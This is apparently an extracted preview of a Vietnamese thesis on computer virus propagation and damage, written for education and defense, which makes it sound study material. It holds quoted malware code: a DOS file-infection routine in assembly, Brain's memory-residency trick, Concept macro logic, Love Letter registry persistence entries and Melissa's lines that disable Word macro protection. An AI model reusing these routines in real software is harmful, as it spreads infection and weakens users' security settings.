- Các kỹ thuật chính . - Phần lây lan của file virus Hình 2.4. - Quá trình lây lan vào file normal.dot Hình 2.6. - Quá trình lây lan vào file văn bản Hình 2.7. - Mặt khác, cũng không thể phủ nhận tính tích cực của virus máy tính, bởi virus máy tính chỉ có thể phát triển được dựa trên những sơ xuất của công nghệ và người sử dụng nên thông qua việc tìm hiểu về các cơ chế hoạt động của virus, các phương thức lây lan cũng như phá hoại của chúng ta có thể đưa ra các giải pháp cải thiện chất lượng và độ an toàn của phần mềm cũng như các hệ thống. - Thế nhưng, cũng có một thực tế rằng tại Việt Nam, những tài liệu nghiên cứu về virus máy tính là vô cùng ít ỏi và thiếu chi tiết, dẫn đến hậu quả là những người sử dụng máy tính thường không có đủ kiến thức cần thiết để tự bảo vệ máy tính và dữ liệu của mình trước sự tấn công của virus máy tính. - Xuất phát từ các yếu tố trên, bản luận văn này lựa chọn đề tài: “Các phương pháp lây lan và phá hoại của virus máy tính” Luận văn được chia làm 3 chương, với nội dung từng chương như sau. - Chương 2: Tìm hiểu các cơ sở lý thuyết giúp xây dựng nên virus máy tính, các phương thức lây lan và phá hoại của virus máy tính gắn với từng giai đoạn phát triển. - Mặc dù việc sử dụng các thiết bị và phần mềm bảo mật trở nên phổ biến, virus vẫn tiếp tục phát triển mạnh mẽ do giờ đây chúng thường được viết ra có mục đích rõ ràng, phục vụ một đối tượng cụ thể và không ngừng cải tiến qua các phiên bản để đạt được phiên bản hiệu quả nhất. - Phân loại các phần mềm độc hại Có nhiều cách phân loại các phần mềm độc hại và do đó định nghĩa về chúng cũng có đôi chút khác nhau, ở đây chỉ xin trình bày một cách phân loại đơn giản nhất và sẽ sử dụng thống nhất trong toàn bộ luận văn. - Bugware: Các chương trình hoặc các phần mềm hợp lệ được thiết kế để thực hiện một số chức năng nào đó nhưng do lỗi lập trình nên gây lỗi cho hệ thống khi sử dụng. - Trojan horse: Các đoạn chương trình có hại được cài có chủ định vào trong các chương trình hợp lệ, có thể tiến hành phá hoại, ăn cắp thông tin của người sử dụng v.v.. - không có khả năng lây lan. - Worm: Chương trình được thiết kế để tự lây lan chính nó từ một máy tính tới một máy tính khác qua mạng. - Ngày nay hầu hết những người sử dụng máy tính không còn quan tâm nhiều đến chi tiết độ dài file, ngày tháng tạo lập hay sửa đổi chúng vì hệ điều hành Windows đã tạo ra một môi trường làm việc thuận lợi hơn cho người sử dụng và cũng thuận lợi cho các tác giả virus. - Sự phát triển của virus nói riêng và các phần mềm độc hại nói chung có thể chia làm bốn giai đoạn kéo dài từ năm 1979 đến bây giờ (trong các tài liệu nước ngoài, các tác giả hay sử dụng thuật ngữ “wave”, thuật ngữ “giai đoạn” ít được dùng hơn bởi vì virus trong một giai đoạn thực ra không phải là sự phát triển trực tiếp từ giai đoạn trước đó). - Sau đó một thời gian ngắn bắt đầu xuất hiện thuật ngữ “worm” chỉ những phần mềm có khả năng tự lây lan qua mạng. - Năm 1987, một trong những worm đầu tiên là Christma Exec có khả năng lây lan qua e-mail giữa 13 các mainframe IBM, đây cũng là một trong những ví dụ đầu tiên của việc lừa đảo theo kiểu “social engineering”, người sử dụng bị đánh lừa để thực thi virus bởi vì nội dung của email cho biết nếu được thực thi nó sẽ vẽ một cây thông Noel, và đúng là worm có thực hiện việc vẽ một cây thông Noel lên màn hình (bằng cách sử dụng ngôn ngữ kịch bản REXX) nhưng đồng thời nó cũng gửi một bản sao của mình tới những người sử dụng khác nằm trong danh sách email của nạn nhân. - Những người sử dụng đó rất tin tưởng vì nhận được email từ người họ quen biết và họ cũng mở email ra. - viết ra worm Morris lây lan tới 6000 máy tính chỉ trong vài giờ (khoảng 10% số máy trên Internet tại thời điểm đó). - Trong thời kỳ này, virus bắt đầu chuyển từ hệ điều hành DOS sang tấn công hệ điều hành Windows, xuất hiện các virus macro, các virus bắt đầu sử dụng kỹ thuật đa hình để ngụy trang tránh bị phát hiện và đặc biệt là xu hướng sử dụng e-mail như là một công cụ để phát tán. - Trong thời kỳ này các virus sử dụng dấu hiệu nhận dạng bằng các từ khóa nên dễ dàng bị phát hiện khi các phần mềm diệt virus tiến hành quét và phân tích file. - Để đối phó, ban đầu virus sử dụng thuật toán mã hóa để che dấu sự tồn tại của mình, tuy nhiên để thực hiện việc này virus phải xây dựng cả thủ tục mã hóa và thủ tục giải mã và vẫn có yếu điểm nên vẫn bị các phần mềm diệt virus phát hiện. - 14 Khoảng năm 1989, virus sử dụng kỹ thuật ngụy trang đa hình (polymorphism) xuất hiện, đây là một kỹ thuật phức tạp cho phép virus tự biến đổi để tránh bị các công cụ dò tìm phát hiện. - Năm 1995 đánh dấu sự xuất hiện của virus macro đầu tiên có tên gọi là Concept, virus này được viết để lây nhiễm vào file normal.dot của Microsoft Word sử dụng cho hệ điều hành Windows 95. - Tuy nhiên, đa số người sử dụng hiện giờ đều biết cách bỏ tính năng thực hiện các macro trong Office và vì vậy virus đã bị mất đi tính phổ biến cũng như các lợi thế của mình. - Mỗi e-mail do người sử dụng gửi đi đều chứa worm. - Tháng 3 năm 1999, virus Melissa lây lan sang 100.000 máy tính trên thế giới chỉ trong 3 ngày. - Nó tự gửi mình qua e-mail sử dụng Microsoft Outlook hoặc Exchange tới các địa chỉ nằm trong hộp thư. - Tháng 5 năm 2000, worm Love Letter lây lan rất nhanh dưới dạng một e-mail với subject "I love you" và file đính kèm có đuôi dạng text để lừa người sử dụng đọc trong khi thực ra đó là một đoạn VBScript. - Sau đó ít lâu bắt đầu xuất hiện các worm có khả năng disable các antivirus như Klez và Bugbear vào tháng 10 năm 2001, một số worm khác còn tiến hành ghi lại các thao tác bàn phím của người sử dụng để gửi về cho hacker. - Worm Sobig.F xuất hiện và lây lan rất nhanh ngay sau đó. - Các xu hướng phát triển Ta nhận thấy một số xu hướng chính trong việc lây lan và phá hoại của virus trong thời gian qua như sau. - Thứ ba, các virus và worm đã rất thành công trong việc tìm kiếm và sử dụng các vật trung gian truyền nhiễm khác như mạng ngang hàng, tin nhắn nhanh, các thiết bị không dây v.v.. - điều này cũng hỗ trợ cho việc tăng nhanh tốc độ lây lan của virus. - Boot virus Boot virus xuất hiện trong giai đoạn đầu của virus máy tính, đây là thời kỳ của những thế hệ máy tính cá nhân đầu tiên sử dụng bộ vi xử lý của Intel và hệ điều hành DOS của Microsoft, lẽ dĩ nhiên virus máy tính cũng tận dụng ưu thế vượt trội của những bộ vi xử lý cũng như tính phổ biến của hệ điều hành này để khuyếch trương ảnh hưởng của mình. - Thông thường với cả SB virus và DB virus, vị trí lý tưởng nhất để giấu đoạn mã của boot sector chuẩn là các sector không sử dụng của Partition table. - Cấu trúc chương trình Do đặc điểm boot virus được thực hiện trước cả hệ điều hành nên nó có ưu thế là không bị phụ thuộc vào bất cứ hệ điều hành nào nhưng cũng có một nhược điểm là không sử dụng được các dịch vụ có sẵn của hệ điều hành mà phải tự thiết kế toàn bộ các thủ tục của mình. - Phần thân Thực hiện việc kiểm tra và lây lan trên các đối tượng thích hợp, phá hoại chương trình hoặc dữ liệu v.v..có thể mô tả bằng lưu đồ thuật toán như sau: Hình 2.2. - Các kỹ thuật chính Kiểm tra tính tồn tại duy nhất Trong quá trình lây lan trên đĩa, virus phải kiểm tra để đảm bảo chỉ lây mỗi đĩa một lần để không làm chậm hoạt động của hệ thống. - Trước khi vào thường trú virus cũng phải kiểm tra xem trước đó nó đã được nạp vào trong vùng nhớ chưa, nếu đã được nạp rồi thì thôi vì quá trình nạp một virus nhiều lần vào vùng nhớ sẽ làm chậm quá trình khởi động, ảnh hưởng đến việc nạp và thi hành các chương trình khác, giảm vùng nhớ quy ước đi nhiều gây sự chú ý không cần thiết của người sử dụng. - Thông thường hệ điều hành chỉ quản lý được dung lượng bộ nhớ quy ước do BIOS quy định được ghi trong địa chỉ 0:0413h sau quá trình POST, lợi dụng điều này boot virus sẽ thay đổi giá trị nằm trong địa chỉ 0:0413h sau khi đã trừ đi dung lượng bộ nhớ nó cần sử dụng. - Đoạn mã sau được trích từ source code của virus Brain ver.1 để minh họa cho kỹ thuật thường trú trong bộ nhớ cao: mov ax,bw0413 sub ax,7 mov bw0413,ax Kỹ thuật này có một nhược điểm là nếu máy tính khởi động lại (reset) thì quá trình kiểm tra bộ nhớ không được thực hiện lại, do đó virus lại giảm kích thước trong địa chỉ 0:0413h đi một lần nữa, vì thế dễ gây chú ý cho người sử dụng khi thấy dung lượng vùng nhớ ngày càng bị thu hẹp. - RF Virus Có thường trú trong bộ nhớ, khống chế hoạt động của máy tính bằng cách chiếm các ngắt (phổ biến nhất là ngắt 21h) để tiến hành lây lan. - Ta có thể mô tả hoạt động của phần lây lan bằng lưu đồ thuật toán sau: 28 Hình 2.3. - Phần lây lan của File virus Để lây lan vào file đối tượng, thường file virus hay sử dụng một số phương pháp sau (chung cho cả hai loại RF virus và TF virus. - Các kỹ thuật chính Kiểm tra tính tồn tại duy nhất Cũng giống như boot virus, để giảm khả năng bị phát hiện, trước khi lây lan file virus bắt buộc phải kiểm tra sự tồn tại của mình trên đối tượng sắp lây. - Kiểm tra trên file: Có hai kỹ thuật chính hay được sử dụng là so sánh kích thước và kiểm tra mã nhận dạng. - Kỹ thuật so sánh kích thước cho độ chính xác thấp nên ít được sử dụng. - Kiểm tra trong bộ nhớ: Do yêu cầu thường trú, các RF virus phải tiến hành kiểm tra trong bộ nhớ trước khi cài đặt Có hai kỹ thuật chính hay được sử dụng là kiểm tra mã nhận dạng và tạo ngắt giả, trong đó kỹ thuật tạo ngắt giả là một sáng tạo của những người viết virus. - PSP: Chỉ ra vùng nhớ được MCB quản lý hiện còn trống hay đang cấp cho chương trình nào, nếu còn trống sẽ có giá trị 0, nếu đang được sử dụng sẽ mang giá trị PSP của chương trình xin cấp phát. - Lây lan Trong quá trình lây lan, virus phải đảm bảo được các yếu tố sau: Khống chế được các thông báo lỗi: Người viết virus phải lường trước các trường hợp lỗi xảy ra, ví dụ khi virus lây lan trên một đĩa mềm có lẫy chống ghi, hệ điều hành sẽ ngay lập tức đưa ra thông báo: Write on protect disk mặc dù tại thời điểm đó người sử dụng không hề có bất cứ thao tác ghi nào lên đĩa và hành động của virus sẽ bị phát hiện ngay. - rw_open_quit: mov ax,5701h mov dx,cs:143h mov cx,cs:145h int 21h mov ah,3eh int 21h Định vị file đối tượng: Các virus sử dụng phương pháp chèn đầu trước hết phải xin cấp phát vùng nhớ, chuyển chương trình vào vùng nhớ này, đọc file đối tượng vào tiếp sau rồi ghi lại toàn bộ file. - Các virus sử dụng phương pháp nối đuôi phải dời con trỏ tới cuối file đối tượng để ghi đoạn mã của mình vào, quay lại đầu chương trình để sửa lệnh nhảy đến đầu đoạn mã của virus. - mov ax,3D02h lea dx,[bp+offset DTA+1Eh] int 21h mov bx,ax mov ax,4202h mov cx,-1 mov dx,-2 36 int 21h mov ah,3fh mov cx,2 lea dx,[bp+offset buf_id] int 21h cmp word ptr [bp+offset buf_id],'PT' je close_file mov ah,3fh mov cx,3 lea dx,[bp+offset three_byte] int 21h mov ax,4202h xor cx,cx xor dx,dx int 21h sub ax,3 mov word ptr [bp+offset newjump+1],ax mov ax,4200h xor cx,cx xor dx,dx int 21h mov ah,40h mov cx,3 lea dx,[bp+offset newjump] int 21h mov ax,4202h xor cx,cx xor dx,dx int 21h mov ah,40h ‘ ghi virus code mov cx,virus_end-virus_start 37 lea dx,[bp+offset virus_start] int 21h mov ah,3eh int 21h Muốn tồn tại, virus phải tìm được các file đối tượng thích hợp để lây lan, thường tất cả các virus đều sử dụng kỹ thuật tìm kiếm bằng chức năng 4Eh và 4Fh của ngắt 21. - Một trong những lý do là các kỹ thuật mà virus dựa trên nền DOS sử dụng không còn tương thích với Windows 95 nữa. - Để kiểm soát hệ thống ở cấp thấp Windows sử dụng cơ chế Rings. - Các kỹ thuật chính Tìm địa chỉ cơ sở của kernell32.dll Để có thể sử dụng các hàm API của hệ điều hành, trước hết virus phải tìm được địa chỉ cơ sở của file thư viện liên kết động kernell32.dll. - Macro virus Năm 1995 cũng đánh dấu sự xuất hiện của macro virus, tuy đơn giản về kỹ thuật nhưng ý tưởng xây dựng nên dòng virus này lại cực kỳ thú vị, chỉ bằng cách khai thác những dòng mã lệnh và tính năng được thiết kế nhằm mang lại sự thuận tiện trong công việc của người sử dụng, những người viết virus có thể tạo nên các chương trình gây nên những tổn thất lớn về thời gian cũng như tiền bạc cho người sử dụng. - Nguyên lý hoạt động của macro virus dựa trên việc bộ chương trình Office cho phép người sử dụng tự tạo ra các macro bằng ngôn ngữ lập trình dành cho các ứng dụng (Visual Basic for Application – VBA) để phục vụ cho công việc đặc thù của mình. - Lợi dụng điều này, những người viết virus tạo ra 42 các macro có khả năng tự động thi khi chương trình ứng dụng khởi động hoặc tùy vào thao tác mà người sử dụng tác động vào hệ thống. - 43 • AutoOpen: Macro sẽ tự động thực thi file file văn bản đã bị lây nhiễm được người sử dụng mở ra. - Khi người sử dụng mở một file văn bản đã bị nhiễm macro virus, các macro trong đó sẽ thực hiện các công việc sau. - Macro FileSaveAs thay đổi hộp thoại FileSaveAs để cho phép save tất cả các file văn bản bình thường mà người sử dụng muốn save thành dạng template, đương nhiên trong file template đó ngoài văn bản và định dạng của văn bản như bình thường còn chứa cả các macro của virus. - Ta sẽ thấy quá trình lây lan đó trong hình vẽ dưới đây Hình 2.5. - Quá trình lây lan vào file Normal.dot của Concept virus Văn bản đã bị lây nhiễm AAAZAO AAAZFS AutoOpen PayLoad Normal.dot AAAZAO AAAZFS FileSaveAs Payload 44 Đoạn mã sau được trích từ source code macro AutoOpen của macro virus Concept để minh họa cho kỹ thuật lây lan vào file Normal.dot. - Đoạn mã sau được trích từ source code macro FileSaveAs của macro virus Concept để minh họa cho kỹ thuật lây lan vào file văn bản. - Macro virus giải quyết điều này bằng cách sử dụng một kỹ thuật đa hình (polymorphism) đơn giản đó là biến đổi tên của các macro sau mỗi lần lây nhiễm và lưu trữ chúng trong file win.ini để khi khởi động lại Microsoft Word có thể tìm được tên các macro này. - Một trong những macro virus đầu tiên áp dụng kỹ thuật đa hình kiểu này là Outlaw, virus này tự sinh ra các tên bao gồm cả phần chữ và phần số bằng cách sử dụng các hàm ngẫu nhiên. - Worm đầu tiên được biết đến là Morris worm do một sinh viên của Đại học Cornell viết ra năm 1988 đã lây lan vào khoảng 10% số máy chủ trên Internet thời kỳ đó gây thiệt hại lớn nhưng đồng thời cũng đánh dấu sự thay đổi nhận thức của người sử dụng về an ninh và độ tin cậy của Internet. - Nhiều tổ chức đã phải đóng hệ thống email của mình để tránh sự lây lan của virus. - Thực chất Melissa là một macro virus và lây lan trước hết trên các file văn bản của Microsoft Word 97/2000 nhưng điều đặc biệt là nó lại có tính năng lây lan rất mạnh qua mạng, sử dụng email như một công cụ để phát tán, dựa trên đặc điểm này ta sẽ xem xét hoạt động của nó như một worm. - Khi người sử dụng tải file này về và mở ra, macro AutoOpen sẽ tự động thực hiện. - Trước hết nó sẽ hạ mức bảo mật Macro Security của Microsoft Word xuống để cho phép chạy macro khi văn bản được mở ở những lần sau mà không có cảnh báo gì cho người sử dụng. - Khi macro được thi hành, nó sẽ tự đọng gửi email có đính kèm file list.doc tới 50 người nhận đầu tiên trong sổ địa chỉ (Address Book) của người sử dụng hiện tại. - Attachment: LIST.DOC Sau khi thực hiện lây lan qua email xong, Melissa tiếp tục lây nhiễm vào các file văn bản khác, điều nguy hiểm ở chỗ nó có thể gửi đi bất kỳ văn 52 bản nào của người sử dụng chứ không cần là file list.doc như ban đầu, do đó dẫn đến nguy cơ người sử dụng sẽ bị lộ các thông tin nhạy cảm trong file khi nó được gửi ra ngoài. - Bắt đầu Văn bản Word97/2000 ? Vô hiệu hóa chức năng bảo vệ và tiến hành lây nhiễmCó chương trình Outlook ? Address book không rỗng ? Gửi văn bản đã bị nhiễm virus đính kèm email tới 50 địa chỉ đầu tiên Kết thúc Đưa ra thông báo Kiểm tra điều kiện kích hoạt C B A C A Chờ các thao tác của người sử dụng để lây nhiễm C 54 d:\command.com d:\io.sys c:\Ntdetect.com c:\Suhdlog.dat d:\Suhdlog.dat Biến thể Melissa.I lại có khả năng chọn ngẫu nhiên các Subject trong số các Subjject dưới đây để tránh bị các bộ lọc email phát hiện. - Qua sự lây lan của worm Melissa, người sử dụng đã được cảnh báo về khả năng các macro virus cũng có thể tự lây lan qua mạng và sử dụng email như công cụ để phát tán, vì thế họ trở nên rất cảnh giác với các văn bản đính kèm email. - Về mặt nguyên lý hoạt động worm Love Letter cũng gần tương tự như worm Melissa nhưng mã lệnh của nó sử dụng ngôn ngữ kịch bản Visual Basic Scrip và điều khiến nó có thể lây lan được nhanh chóng là file Script đính kèm lại có dạng LOVE-LETTER-FOR-YOU.TXT.vbs, và phần mở rộng thật sự .vbs bị ẩn đi. - Người sử dụng chỉ đọc được email có file đính kèm dạng .txt nên họ cũng không thể ngờ khi mở nó ra, máy tính của họ cũng bị nhiễm virus. - Sau đó nó thay đổi IE homepage để tải về một chương trình Trojan horse ăn cắp mật khẩu của người sử dụng và gửi ra ngoài đồng thời cũng gửi email có đính kèm bản sao của mình tới các địa chỉ email nằm trong Address book của máy tính đã bị lây nhiễm. - Ví dụ trên máy của người sử dụng có file ảnh unmemo.jpg sẽ bị xóa đi và thay một file chứa đoạn mã của worm có tên unmemo.jpg.vbs. - Gọi thủ tục listdtrive() Address book không rỗng ? Tạo Outlook object Gửi email có file LOVELETTERFORYOU.TXT.vbsTìm, thay thế các file thích hợp bằng các file mã virus Kết thúc + B A Sinh số ngẫu nhiên 1 - 4 đặt vào IE homepage FAT32 ? Có file WINBUGSFIX Ghi 3 file mã lệnh virus vào thư mục hệ thống - Bắt đầu Timeout đã được đặt ? Tạo Windows Shell, File System object A Tải WINBUGSFIX và thiết lập chế độ chạy khi khởi độngĐọc Registry Timeout Reset Timeout Đặt IE homepage: blank Gọi html() B Tạo HTML page với VBS 57 Hai worm ta vừa xét tuy có tốc độ lây lan vô cùng nhanh chóng nhưng vẫn phải sử dụng email như công cụ để phát tán, do vậy, nếu người sử dụng cảnh giác, họ có thể giảm thiểu được sự lây lan và tác hại của chúng. - Vì thế Code Red ver.1 thực hiện quét và lây nhiễm lại trên các máy tính đã bị nhiễm rồi do đó hạn chế sự lây lan rất nhiều. - Các kỹ thuật chính Cài đặt vào máy tính của người sử dụng Đoạn mã sau được trích từ source code của worm I Love You để minh họa cho kỹ thuật cài đặt vào máy tính của người sử dụng khi họ mở file LOVE-LETTER-FOR-YOU.TXT.vbs. - Đây là các file hạt nhân của worm, tên của chúng được đặt để đánh lừa người sử dụng vì thoạt nhìn rất giống các file hệ thống của Windows. - 59 regcreate"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs” regcreate"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs" Hơi khác đi một chút, vì là sự lai ghép giữa dòng worm và dòng macro virus nên worm Melissa sẽ lây nhiễm vào file normal.dot trên máy tính của người sử dụng khi file văn bản đã bị nhiễm macro được người sử dụng mở ra và ngược lại, nó sẽ nhiễm vào các văn bản sạch khác khi chúng được người sử dụng đóng lại. - 61 Lây lan qua email Worm Love Letter xây dựng hẳn thủ tục spreadtoemail() để thực hiện việc phát tán qua email. - scriptini.close eq=folderspec end if end if next end sub Trong khi đó Melissa lại chỉ phá hoại bằng cách chèn một đoạn text vào văn bản của người sử dụng khi điều kiện kích hoạt xảy ra. - 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions Options.VirusProtection Options.SaveNormalPrompt = (1 - 1) End If Download trojan Đoạn mã sau được trích từ source code của worm Lover Letter để minh họa kỹ thuật tự động download Trojan về máy tính của người sử dụng. - nhiều người sử dụng kinh ngạc và tự hỏi tại sao các phần mềm diệt virus mà họ vẫn sử dụng lại không ngăn chặn được worm từ lúc chúng bắt đầu lây nhiễm vào máy của họ và làm thế nào để các phần mềm diệt virus này có thể bảo vệ dữ liệu của họ trong tương lai. - Các chương trình chống virus truyền thống thường sử dụng hệ thống phát hiện dựa trên việc đối sánh sánh mẫu (pattern matching) hoặc phương pháp quét (scanner). - Những mẫu trong cơ sở dữ liệu hiện nay không thể sử dụng được để đối sánh mẫu khi virus có nhiều biến thể khác nhau. - Quá trình phân tích bao gồm việc giải mã sử dụng kỹ thuật code simulation và phân tích static code. - Hai kỹ thuật này được sử dụng bổ trợ cho nhau, ví dụ trong trường hợp gặp một unknow virus có mã hóa thì kỹ thuật code simulation sẽ được thực hiện trước để giải mã virus rồi sau đó mới thực hiện việc phân tích static code. - Phân tích lưu lượng Worm phát tán qua email vừa chiếm dụng tài nguyên mạng vừa được sử dụng như là phương tiện để thực hiện các cuộc tấn công từ chối dịch vụ phân tán (Distributed Deny Of Service attack – DDoS). - Trong thời gian gần đây các đợt bùng phát của worm tấn công và lây lan qua email ngày càng tăng, phần vì do người sử dụng thường không cập nhật các bản nâng cấp của phần mềm diệt virus, phần do sự yếu kém của các phần mềm này trong việc 71 phát hiện các unknown virus cũng như việc lọc không hiệu quả tại các mail server. - Nếu một host thay đổi hành vi của nó bằng cách thiết lập một số lượng lớn các kết nối SMTP trong suốt đợt bùng phát của worm, nó sẽ được dánh dấu như là đã có thể bị lây nhiễm, sau đó sẽ phải sử dụng một thuật toán khác để đánh giá việc lây nhiễm này có thật sự hay không. - Luồng SMTP ra tại mail server Từ việc thống kê các luồng TCP, có thể nhận thấy worm Sobig sử dụng nhiều chiến lược để lây lan hơn worm MyDoom, mặc dù trong trường hợp này số máy tính bị nhiễm worm Sobig có thể ít hơn số máy tính bị nhiễm worm MyDoom nhưng tổng số luồng sinh ra bởi các máy nhiễm worm Sobig lớn hơn 50% so với tổng số luồng sinh ra bởi các máy nhiễm worm MyDoom. - DNS Traffic: Do worm lây nhiễm vào các mục tiêu bằng cách sử dụng danh sách địa chỉ email, để thực hiện được việc này SMTP engine của worm phải tiếp xúc với DNS server để lấy địa chỉ IP của mail server đích, do đó chắc chắn sẽ có một số lượng lớn các DNS query được tạo ra trong suốt đợt bùng phát của worm
Xem thử không khả dụng, vui lòng xem tại trang nguồn hoặc xem
Tóm tắt